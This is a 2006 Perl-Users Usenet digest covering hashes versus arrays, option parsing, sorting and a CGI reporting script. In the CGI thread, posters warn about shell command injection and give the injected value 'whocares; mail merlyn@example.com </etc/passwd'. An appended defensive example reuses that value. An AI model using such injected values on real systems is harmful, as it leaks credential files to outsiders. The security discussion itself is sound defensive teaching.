[28394] in Perl-Users-Digest
Perl-Users Digest, Issue: 9758 Volume: 10
daemon@ATHENA.MIT.EDU (Perl-Users Digest)
Sat Sep 23 18:05:59 2006
Date: Sat, 23 Sep 2006 15:05:06 -0700 (PDT)
From: Perl-Users Digest <Perl-Users-Request@ruby.OCE.ORST.EDU>
To: Perl-Users@ruby.OCE.ORST.EDU (Perl-Users Digest)
Perl-Users Digest Sat, 23 Sep 2006 Volume: 10 Number: 9758
Today's topics:
Re: An interactive interpreter/shell? <bik.mido@tiscalinet.it>
Re: differences between hashes and arrays ? <hjp-usenet2@hjp.at>
Re: differences between hashes and arrays ? <rvtol+news@isolution.nl>
Re: differences between hashes and arrays ? <bik.mido@tiscalinet.it>
Re: differences between hashes and arrays ? <bik.mido@tiscalinet.it>
Re: How identify if more than one option is specified? <rvtol+news@isolution.nl>
Re: How identify if more than one option is specified? <benmorrow@tiscali.co.uk>
Re: passing multiple values into an argument as an arra (reading news)
Re: passing multiple values into an argument as an arra usenet@DavidFilmer.com
Re: passing multiple values into an argument as an arra <bik.mido@tiscalinet.it>
Re: passing multiple values into an argument as an arra <nobull67@gmail.com>
Re: perl sort <honza@burdil.cz>
Re: perl sort <bik.mido@tiscalinet.it>
Re: perl sort <bik.mido@tiscalinet.it>
Re: perl sort <benmorrow@tiscali.co.uk>
Re: Russel Quong's "Perl in 20 pages" <bik.mido@tiscalinet.it>
submatch scoping in while <jcb@inf.ed.ac.uk>
Web Reporting Enhancement <pmcgover@gmail.com>
Re: Web Reporting Enhancement (Randal L. Schwartz)
Re: Web Reporting Enhancement <pmcgover@gmail.com>
Re: Web Reporting Enhancement <nobull67@gmail.com>
Re: Web Reporting Enhancement <nobull67@gmail.com>
Digest Administrivia (Last modified: 6 Apr 01) (Perl-Users-Digest Admin)
----------------------------------------------------------------------
Date: 23 Sep 2006 12:39:18 +0200
From: Michele Dondi <bik.mido@tiscalinet.it>
Subject: Re: An interactive interpreter/shell?
Message-Id: <2t0ah2htvsqampjqk40evddum72jib6mp2@4ax.com>
On 22 Sep 2006 13:46:39 -0700, "robb@acm.org" <robb@acm.org> wrote:
>Is there a shell out there that has functionality like Python's
>interactive interpreter? I've seen references to a few things out
Yes, but it has a strange name. It's called
perl -de42
>there (two different projects named psh?) But they don't look like
>they're currently being worked on, or are up to date.
That's a different thing, anyway.
Michele
--
{$_=pack'B8'x25,unpack'A8'x32,$a^=sub{pop^pop}->(map substr
(($a||=join'',map--$|x$_,(unpack'w',unpack'u','G^<R<Y]*YB='
.'KYU;*EVH[.FHF2W+#"\Z*5TI/ER<Z`S(G.DZZ9OX0Z')=~/./g)x2,$_,
256),7,249);s/[^\w,]/ /g;$ \=/^J/?$/:"\r";print,redo}#JAPH,
------------------------------
Date: Sat, 23 Sep 2006 09:11:40 +0200
From: "Peter J. Holzer" <hjp-usenet2@hjp.at>
Subject: Re: differences between hashes and arrays ?
Message-Id: <slrneh9nhc.d1.hjp-usenet2@yoyo.hjp.at>
On 2006-09-23 00:39, Chris Mattern <syscjm@sumire.eng.sun.com> wrote:
> In article <x77izvabiw.fsf@mail.sysarch.com>, Uri Guttman wrote:
>>hmm, in general arrays have faster lookups than hashes. me thinks you
>>confused the OP's statement. and arrays definitely use less storage
>>(even excluding the key itself) for each element.
>
> That's true in most languages because in most languages arrays
> are required to have all elements be the same type, making
> looking up an element a simple matter of pointer arithmetic
> (you see this in its most naked form in a higher-level language
> in C, where arrays and pointers are the same thing,
It seems people are just as confused about the difference between arrays
and pointers in C as they are about the difference between arrays and
lists in Perl :-)
Arrays and pointers in C are definitely not the same thing. An array is
a group of elements of the same type, while a pointer, well, points to
an element of a certain type. You notice the difference when you try to
assign to an array (doesn't work) or when you use sizeof on a pointer
(probably not what you wanted), and very spectacularly if you define a
variable as "int a[10]" in one source file and declare it as "extern int
*a" in another. However:
> and array lookups are defined in the language as pointer arithmetic.
This is true. (Actually it's the other way round: Pointer arithmetic is
defined in terms of accesses to array elements)
When you use an array as an rvalue in an expression, it is converted to
a pointer to its first element. Thus you can use an array as an rvalue
wherever you can use a pointer.
(There is also the syntactic quirk that you cannot use arrays as
parameters, but it's not an error to try - the compiler will just
silently convert the array declaration to a pointer declaration)
hp
--
   _  | Peter J. Holzer    | > Why should one invent something that does
|_|_) | Sysadmin WSR       | > not exist?
| |   | hjp@hjp.at         | What else would be the point of inventing?
__/   | http://www.hjp.at/ |    -- P. Einstein and V. Gringmuth in desd
------------------------------
Date: Sat, 23 Sep 2006 15:11:50 +0200
From: "Dr.Ruud" <rvtol+news@isolution.nl>
Subject: Re: differences between hashes and arrays ?
Message-Id: <ef3itu.rg.1@news.isolution.nl>
Chris Mattern wrote:
> Jack:
>> why aren't folks using hashes instead of arrays since (I believe) they
>> are faster to access and take up the same or less memory than
>> arrays..
>
> Um, no, arrays are much more efficient than hashes.
No, they are and they aren't. It all depends on what you use them for.
<example type="bad">
my %hary = (
    0 => q{foo},
    1 => q{bar},
) ;
my @ash = (
    [q{dgd vggw ggg tgregdtg trgregfdsggt gtdeg trg}, q{foo}] ,
    [q{wgdeg ergrewg rewgrew grewg ewg ewgew gewrgewg}, q{bar}] ,
) ;
</example>
--
Anyway, Ruud
"Ordinary is a tiger."
------------------------------
Date: 23 Sep 2006 20:23:52 +0200
From: Michele Dondi <bik.mido@tiscalinet.it>
Subject: Re: differences between hashes and arrays ?
Message-Id: <tvsah257pn39kl94iluiu18d3nl05melu7@4ax.com>
On 22 Sep 2006 10:01:50 -0700, "Jack" <jack_posemsky@yahoo.com> wrote:
>Michele Dondi wrote:
[snip]
>> --
>> {$_=pack'B8'x25,unpack'A8'x32,$a^=sub{pop^pop}->(map substr
>> (($a||=join'',map--$|x$_,(unpack'w',unpack'u','G^<R<Y]*YB='
>> .'KYU;*EVH[.FHF2W+#"\Z*5TI/ER<Z`S(G.DZZ9OX0Z')=~/./g)x2,$_,
>> 256),7,249);s/[^\w,]/ /g;$ \=/^J/?$/:"\r";print,redo}#JAPH,
Please do not top-quote. And in particular do not quote signatures.
>Thanks for the comments all. For these applications, which is better
>suited, array or hash, and assume a very large volume of data and
>consider memory :
>1- iterate through a huge list (hash or array?) of values and compare
No need for either a hash or an array. A list would suffice. But if
the list must be *stored* somewhere, then this somewhere would better
be an array.
>each value in the list, 1 by 1, to a match condition test like
>m/^\d.*?\d$/ (all digits), and then keep the count of the values that
>pass the match test
/^\d.*?\d$/ and $count++ for some_sub();
>2- compare all values in column 1, file 1 (one value at a time ; assume
>10M records ) to determine if the value exists in the target list (hash
>or array?) from column 2 file 2 (assume column 2 is 20M records)
I would certainly extract the records from "column 2 file 2" into a
hash (as keys, values do not really matter). Then I would scan file 1
line by line, extracting the wanted record to check for existence in
the hash. So as far as "column 1, file 1" is concerned and the
question is "hash or array?" the answer is "neither!"
Michele
------------------------------
Date: 23 Sep 2006 20:23:53 +0200
From: Michele Dondi <bik.mido@tiscalinet.it>
Subject: Re: differences between hashes and arrays ?
Message-Id: <kurah25g84i5k2t2fcprsett53u3psdeaa@4ax.com>
On Sat, 23 Sep 2006 00:39:07 -0000, syscjm@sumire.eng.sun.com (Chris
Mattern) wrote:
>That's true in most languages because in most languages arrays
>are required to have all elements be the same type, making
>looking up an element a simple matter of pointer arithmetic
Again there are two issues here: the actual nature of a hash as a map
having a domain that is a somewhat generic set for as opposed to that
of an array from a special set, that has additional underlying
properties on the one hand and the corresponding implementation details
on the other one. Implementation details differ from language to
language, but it is intuitive that associative arrays will require a
sophisticated search algorithm and arrays due to their simpler, more
"natural" characteristics, a straightforward lookup mechanism. Of
course these implementation details *do* matter even if not taken into
account in... ehm... detail. For otherwise "regular" arrays may be
implemented (if not at the syntactical level, at the semantical one)
in any sufficiently powerful language: it can certainly be done so in
Perl and thanks to tie() also very closely syntactically - but it
wouldn't be particularly useful nor interesting.
Michele
------------------------------
Date: Sat, 23 Sep 2006 15:22:44 +0200
From: "Dr.Ruud" <rvtol+news@isolution.nl>
Subject: Re: How identify if more than one option is specified?
Message-Id: <ef3jgo.u4.1@news.isolution.nl>
Hemant Shah wrote:
> [Getopt::Std]
> Is there an easy way to find out if more than one option is
> specified.
Yes: allow only one option, with an argument (as David already said).
Of course there are many examples of popular executables with exclusive
global options, like the -E and -G of grep. In such case, the last one
should win.
--
Anyway, Ruud
"Ordinary is a tiger."
------------------------------
Date: Fri, 22 Sep 2006 20:58:33 +0100
From: Ben Morrow <benmorrow@tiscali.co.uk>
Subject: Re: How identify if more than one option is specified?
Message-Id: <9srdu3-ub3.ln1@osiris.mauzo.dyndns.org>
Quoth NoJunkMailshah@xnet.com:
>
> Is there an easy way to find out if more than one option is specified.
>
> Example:
>
> use Getopt::Std;
> getopts(abc);
> if ($opt_a || $opt_b || $opt_c) {}
>
> I only want user to specify one of the options (either -a or -b -or -c).
> How do I easily check if they have specified more than one option.
use Getopt::Declare;
my $args = Getopt::Declare->new(<<'OPTS');
-a Do some a-ish-type thing
-b Do some b-ish-type thing
-c Do some c-ish-type thing
[mutex: -a -b -c]
OPTS
# (note that there should be a literal tab after each -x)
# Ben
--
I must not fear. Fear is the mind-killer. I will face my fear and
I will let it pass through me. When the fear is gone there will be
nothing. Only I will remain.
benmorrow@tiscali.co.uk Frank Herbert, 'Dune'
------------------------------
Date: Sat, 23 Sep 2006 07:43:30 GMT
From: "Mumia W. (reading news)" <paduille.4058.mumia.w@earthlink.net>
Subject: Re: passing multiple values into an argument as an array ?
Message-Id: <CA5Rg.1370$o71.843@newsread3.news.pas.earthlink.net>
On 09/22/2006 10:43 PM, Jack wrote:
> hi folks,
>
> I am reading in arguments just fine using the code below, but I want to
>
> be able to add a variable number of values into an argument into perl -
>
> I want to be able to say
> perl -f value1 value2 ..valueN -v value value2 ..valueN
>
> and store the values of -f in a single array, and -v also (and the
> number of passed values could vary !)
>
> If anyone has any tips that would be great - Thanks, Jack
>
> if (@ARGV[0] eq undef) {
> $value1=@ARGV[0];
> }
> if (@ARGV[1] eq undef) {
> $value2=@ARGV[1];
>
See if you can find a delimiter character for the values so that you can
use this syntax: perl -f value1,value2,..valueN -v value,value2,..valueN
Then it becomes very easy:
    use strict;
    use warnings;
    use Data::Dumper;
    use Getopt::Std;
    my (%opts);
    getopts ('f:v:',\%opts);
    foreach my $value (values %opts) {
        $value = [ split /,/, $value ];
    }
    print Dumper(\%opts);
--
paduille.4058.mumia.w@earthlink.net
------------------------------
Date: 23 Sep 2006 01:23:23 -0700
From: usenet@DavidFilmer.com
Subject: Re: passing multiple values into an argument as an array ?
Message-Id: <1158999803.843092.45910@m73g2000cwd.googlegroups.com>
Jack wrote:
[a multiposted question]
Don't multipost. It's rude.
--
David Filmer (http://DavidFilmer.com)
------------------------------
Date: 23 Sep 2006 12:39:19 +0200
From: Michele Dondi <bik.mido@tiscalinet.it>
Subject: Re: passing multiple values into an argument as an array ?
Message-Id: <g51ah2pbkkam5l7cbttqsjonqdnjptmpm6@4ax.com>
On 22 Sep 2006 20:43:51 -0700, "Jack" <jack_posemsky@yahoo.com> wrote:
>I want to be able to say
>perl -f value1 value2 ..valueN -v value value2 ..valueN
>
>and store the values of -f in a single array, and -v also (and the
>number of passed values could vary !)
You DON'T want that. You want
perl yourscript -f whatever -v whatever
Just use Getopt::* and invent a sensible "format" for whatever, i.e.
comma separated or value separated, and then parse whatever
accordingly, i.e. just split() it.
Michele
------------------------------
Date: 23 Sep 2006 07:38:10 -0700
From: "Brian McCauley" <nobull67@gmail.com>
Subject: Re: passing multiple values into an argument as an array ?
Message-Id: <1159022290.075194.13430@b28g2000cwb.googlegroups.com>
usenet@DavidFilmer.com wrote:
> [a multiposted question]
>
> Don't multipost. It's rude.
Now I think you are being too terse. At least say
Don't multipost. It's rude. See http://....
> David Filmer (http://DavidFilmer.com)
I went there and found a statement "There is nothing on this website,
and there are no plans to ever have any content here" and a link to
another page on the same website. Can I just say "huh?". :-)
------------------------------
Date: Sat, 23 Sep 2006 08:58:26 +0200
From: "Jan Burdil" <honza@burdil.cz>
Subject: Re: perl sort
Message-Id: <ef2lv0$30r3$1@ns.felk.cvut.cz>
This command sorts the output, but not well
ls -l |sort -k 1.37
drwx------ 2 honza users 512 Aug 22 10:54 mail
-rwx------ 1 honza users 54 Jun 14 11:29 aa
-rwx------ 1 honza users 832 Sep 5 19:35 yy
-rwx------ 1 honza users 52 May 31 21:54 bb
...
Jan Burdil
<usenet@DavidFilmer.com> wrote in message
news:1158969197.100768.214850@h48g2000cwc.googlegroups.com...
> Jan Burdil wrote:
>
>> my files are sorted by date. And I need to sort lines from curl command.
>> curl ftp://1.1.1.1 give me
>
> Sometimes the shell way is the easier way. for example:
>
> ls -l |sort -k 1.37
>
> (see also the -t flag of sort)
>
> --
> David Filmer (http://DavidFilmer.com)
>
------------------------------
Date: 23 Sep 2006 12:39:12 +0200
From: Michele Dondi <bik.mido@tiscalinet.it>
Subject: Re: perl sort
Message-Id: <d70ah21t30ub0bp10tgl55su6d0tt4i3kv@4ax.com>
On Fri, 22 Sep 2006 21:22:55 +0200, "Jan Burdil" <honza@burdil.cz>
wrote:
>Subject: perl sort
Not at all!
>how can I replace * with some command like cat file, ls -l in line
>
>perl -e 'print join "\n", sort { -M $b <=> -M $a } <*>,"\n"'
s/*//; # but then no need for join "\n" etc.
and just either pipe into the command, or give an argument of 'ls
-1|'. (Yes, but... why?!?)
^^^^^^^^^^^^^^^^^^
^^^^^^^^^^^^^^^^^^
Michele
------------------------------
Date: 23 Sep 2006 12:39:17 +0200
From: Michele Dondi <bik.mido@tiscalinet.it>
Subject: Re: perl sort
Message-Id: <7i0ah21huugreaj0oa1m9kau8s055oqskg@4ax.com>
On Fri, 22 Sep 2006 22:24:30 +0200, "Jan Burdil" <honza@burdil.cz>
wrote:
>perl -e 'print join "\n", sort { -M $b <=> -M $a } <*>,"\n"'
[snip]
>my files are sorted by date. And I need to sort lines from curl command.
>curl ftp://1.1.1.1 give me
>-rw-r--r-- 1 honza users 414 Sep 22 12:16 curl.txt
>-rwx------ 1 honza users 52 May 31 21:54 bb
>drwx------ 2 honza users 512 Aug 22 10:54 mail
>
>And I would like the result to be sorted by date.
Dwimmeries do not extend so far as "understanding" one's confusion
about a filename referring to an actual file which has some actual
timestamps and a string containing date/time specifications...
Just abandon all hope ye^W^W^W-M altogether and use a date/time
parsing module to obtain something to sort() on. Or else and more
reasonably, abandon curl altogether and use a module that will
retrieve the remote files' timestamps directly.
Michele
------------------------------
Date: Fri, 22 Sep 2006 21:06:00 +0100
From: Ben Morrow <benmorrow@tiscali.co.uk>
Subject: Re: perl sort
Message-Id: <8asdu3-ub3.ln1@osiris.mauzo.dyndns.org>
Quoth "Jan Burdil" <honza@burdil.cz>:
> Subject: perl sort
Please use a sensible Subject. Your question has nothing to do with
sorting.
> how can I replace * with some command like cat file, ls -l in line
>
> perl -e 'print join "\n", sort { -M $b <=> -M $a } <*>,"\n"'
You can skip the last "\n" by adding a -l to your commandline.
You can skip the join by putting
$, = "\n";
before the print statement, though that's arguably no simpler in this
case.
Read the section on qx in perldoc perlop.
Alternatively, you can probably do what you want from within Perl,
without calling an external command.
Ben
--
#!/bin/sh
quine="echo 'eval \$quine' >> \$0; echo quined"
eval $quine
# [benmorrow@tiscali.co.uk]
------------------------------
Date: 23 Sep 2006 12:39:11 +0200
From: Michele Dondi <bik.mido@tiscalinet.it>
Subject: Re: Russel Quong's "Perl in 20 pages"
Message-Id: <glv9h2tj27no9agdbdqortke8re2kqnus3@4ax.com>
On Fri, 22 Sep 2006 16:26:38 -0400, Uri Guttman <uri@stemsystems.com>
wrote:
>i recall all of those. but this guy's comments on arrays and lists being
>the same since the docs say so is as bad as any of those others. the
>absolute certainty of his comments are hysterical. but the only way to
>truly judge these tutes is to make up a page of links, reviews and
>quotes. a worthy project. maybe i will make it a wiki so we can all join
>in.
Just another Hall of Shame!
Michele
------------------------------
Date: Sat, 23 Sep 2006 21:14:28 +0100
From: Julian Bradfield <jcb@inf.ed.ac.uk>
Subject: submatch scoping in while
Message-Id: <e6codt6nxwb.fsf@palau.inf.ed.ac.uk>
Consider the following:
    @x = ( 'aaa','bbb');
    while ( $x[$i] !~ /^(.)b/ && $i <= $#x ) { $i++; }
    print "\$1 is *$1*, i is $i\n";
The loop terminates at $i == 1 when 'bbb' matches ^(.)b
The enclosing block for the match construct is the whole file.
Therefore $1 should be 'b'.
But it isn't (in Perl 5.8.5).
What am I missing?
Compare
    @x = ( 'aaa','bbb');
    if ( $x[$i] !~ /^(.)a/ && $i <= $#x ) { $i++; }
    print "\$1 is *$1*, i is $i\n";
which behaves as expected.
------------------------------
Date: 23 Sep 2006 05:55:23 -0700
From: "pmcgover@gmail.com" <pmcgover@gmail.com>
Subject: Web Reporting Enhancement
Message-Id: <1159016123.818211.172640@i42g2000cwa.googlegroups.com>
I enjoyed Paul Barry's September article in Linux Journal entitled,
"Web Reporting with MySQL, CSS and Perl". It provides a simple,
elegant way to use HTML to display database content without any sql
markup in the cgi script. The cgi script simply calls the Mysql
command line with the HTML option (-H) and the SQL script file directed
to that command. This provides complete separation of the markup from
the sql code. The plain vanilla HTML output can be spruced up with CSS
to provide more color and size control of the HTML.
This model could be much more powerful if you could pass an SQL query
parameter from the user to the sql script. I attempted this by
substituting the string "p_1" in the where clause of the sql code but I
could not substitute this string with the value in the cgi code (ie.
$query =~ s/p_1/value_variable/;).
Any ideas how this could be made to work? Would it be a security
issue, or is it still possible to "taint" the user input value?
Thanks!
Below is a link to the article:
http://delivery.acm.org/10.1145/1160000/1152907/8281.html?key1=1152907&key2=9804109511&coll=ACM&dl=ACM&CFID=15151515&CFTOKEN=6184618
------------------------------
Date: 23 Sep 2006 06:54:05 -0700
From: merlyn@stonehenge.com (Randal L. Schwartz)
To: "pmcgover@gmail.com" <pmcgover@gmail.com>
Subject: Re: Web Reporting Enhancement
Message-Id: <86fyeiit8i.fsf@blue.stonehenge.com>
>>>>> "pmcgover@gmail" == pmcgover@gmail com <pmcgover@gmail.com> writes:
pmcgover@gmail> Any ideas how this could be made to work? Would it be a security
pmcgover@gmail> issue, or is it still possible to "taint" the user input value?
pmcgover@gmail> Thanks!
pmcgover@gmail> Below is a link to the article:
pmcgover@gmail> http://delivery.acm.org/10.1145/1160000/1152907/8281.html?key1=1152907&key2=9804109511&coll=ACM&dl=ACM&CFID=15151515&CFTOKEN=6184618
Egad! This guy has NO CLUE about security:

    my $query = param( 'query' );
    my $title = param( 'title' );

    The script then creates the command line that runs the query through the MySQL client program. Note that Perl's dot operator is used to concatenate strings:

    my $cmdline = MYSQL .
                  ' -H -u ' .
                  USERID .
                  ' -p' .
                  PASSWD .
                  ' ' .
                  DBNAME .
                  "< $query ";

What if param('query') contains:

    "whocares; mail merlyn@example.com </etc/passwd";

Idiot. People without clues should NOT be writing articles.
print "Just another Perl hacker,"; # the original
--
Randal L. Schwartz - Stonehenge Consulting Services, Inc. - +1 503 777 0095
<merlyn@stonehenge.com> <URL:http://www.stonehenge.com/merlyn/>
Perl/Unix/security consulting, Technical writing, Comedy, etc. etc.
See PerlTraining.Stonehenge.com for onsite and open-enrollment Perl training!
------------------------------
Date: 23 Sep 2006 07:16:48 -0700
From: "pmcgover@gmail.com" <pmcgover@gmail.com>
Subject: Re: Web Reporting Enhancement
Message-Id: <1159021008.559150.51310@k70g2000cwa.googlegroups.com>
Thanks Randal,
> Egad! This guy has NO CLUE about security:
>
> my $query = param( 'query' );
> my $title = param( 'title' );
Did you read the tainting code at the bottom of the article? ....
    $query =~ /^([-\w]+\.sql)$/;
    $query = $1;
    $title =~ /^([\w:.?! ]+)$/;
    $title = $1;
I did some tests and I thought it worked as intended. Anyway, do you
have any ideas how to do the enhancement I mentioned earlier?
Pat
------------------------------
Date: 23 Sep 2006 07:21:51 -0700
From: "Brian McCauley" <nobull67@gmail.com>
Subject: Re: Web Reporting Enhancement
Message-Id: <1159021311.154459.212910@e3g2000cwe.googlegroups.com>
pmcgover@gmail.com wrote:
> This model could be much more powerful if you could pass an SQL query
> parameter from the user to the sql script. I attempted this by
> substituting the string "p_1" in the where clause of the sql code but I
> could not substitute this string with the value in the cgi code (ie.
> $query =~ s/p_1/value_variable/;).
> Below is a link to the article:
> http://delivery.acm.org/....
In that article the variable $query contains the _name_of_a_file_ that
contains the SQL statement.
You are talking about trying to apply substitutions to an SQL statement
in $query.
You either have significantly different code from that in the article or
you are seriously confused.
> Any ideas how this could be made to work?
You could read the SQL template in, pass it through some sort of
templating engine (the simplest just being your s///), write it out
again to a named temporary file then use that filename in the qx//.
Just to be clear, I said you _could_ do this. You could also plunge
your hand into a deep fat fryer. Neither of these are courses of action
I'd recommend.
Abandon the extremely dubious technique of using qx// to call a command
line SQL tool and use DBI (or one of the DBIx modules) and placeholders
like everyone else.
> Would it be a security issue
If you need to ask you really should not be contemplating this course.
------------------------------
Date: 23 Sep 2006 07:27:51 -0700
From: "Brian McCauley" <nobull67@gmail.com>
Subject: Re: Web Reporting Enhancement
Message-Id: <1159021671.139156.242470@e3g2000cwe.googlegroups.com>
Randal L. Schwartz wrote:
> my $cmdline = MYSQL .
> ' -H -u ' .
> USERID .
> ' -p' .
> PASSWD .
> ' ' .
> DBNAME .
> "< $query ";
>
> What if param('query') contains:
>
> "whocares; mail merlyn@example.com </etc/passwd";
I think you'll find the author went on to make that exact same point in
order to illustrate the importance of tainting and laundering.
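
The DBI-with-placeholders route recommended earlier in this thread, combined with laundering that tests the match before $1 is read, as an added example (not code from the article or from any poster in this digest). The %REPORT allow-list, the launder() and run_report() helpers, the files table and the use of DBD::SQLite with an in-memory database are assumptions made for illustration.

```perl
use strict;
use warnings;
use DBI;    # assumption: DBI and DBD::SQLite are installed

# Allow-list of reports. The request selects a report by name; it never
# supplies SQL text or a file name, so nothing user-controlled reaches a shell.
my %REPORT = (
    by_owner => 'SELECT name, size FROM files WHERE owner = ? ORDER BY name',
);

# Launder one value: return the capture only when the whole string matched.
# The match result is tested before $1 is read, because after a failed match
# $1 still holds whatever an earlier successful match left in it.
# \z is used instead of $ so that a trailing newline is not accepted.
sub launder {
    my ($value, $pattern) = @_;
    return undef unless defined $value;
    return $value =~ $pattern ? $1 : undef;
}

sub run_report {
    my ($dbh, $raw_name, $raw_arg) = @_;

    my $name = launder($raw_name, qr/\A(\w{1,32})\z/);
    die "rejected: unknown report\n"
        unless defined $name && exists $REPORT{$name};

    my $arg = launder($raw_arg, qr/\A([-\w.]{1,32})\z/);
    die "rejected: bad parameter\n" unless defined $arg;

    # The value travels as bound data, separate from the SQL text.
    my $sth = $dbh->prepare($REPORT{$name});
    $sth->execute($arg);
    return $sth->fetchall_arrayref;
}

# Constructed sample data in a throwaway in-memory database.
my $dbh = DBI->connect('dbi:SQLite:dbname=:memory:', '', '',
                       { RaiseError => 1, PrintError => 0 });
$dbh->do('CREATE TABLE files (name TEXT, owner TEXT, size INTEGER)');
my $ins = $dbh->prepare(
    'INSERT INTO files (name, owner, size) VALUES (?, ?, ?)');
$ins->execute(@$_)
    for ['aa', 'honza', 54], ['bb', 'honza', 52], ['zz', 'other', 10];

# Constructed requests: one valid, then the string from Randal's post used
# as the report name, then a quote-bearing parameter.
my @requests = (
    [ 'by_owner', 'honza' ],
    [ 'whocares; mail merlyn@example.com </etc/passwd', 'honza' ],
    [ 'by_owner', "honza' OR '1'='1" ],
);

for my $req (@requests) {
    my $rows = eval { run_report($dbh, @$req) };
    if ($rows) {
        print "ok: ",
            join(', ', map { $_->[0] . ' (' . $_->[1] . ')' } @$rows), "\n";
    }
    else {
        print $@;    # the "rejected: ..." message from run_report
    }
}
```

In a CGI script the raw values would come from param() and the script would run under perl -T, so that anything not passed through launder() stays tainted.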
------------------------------
End of Perl-Users Digest V10 Issue 9758
***************************************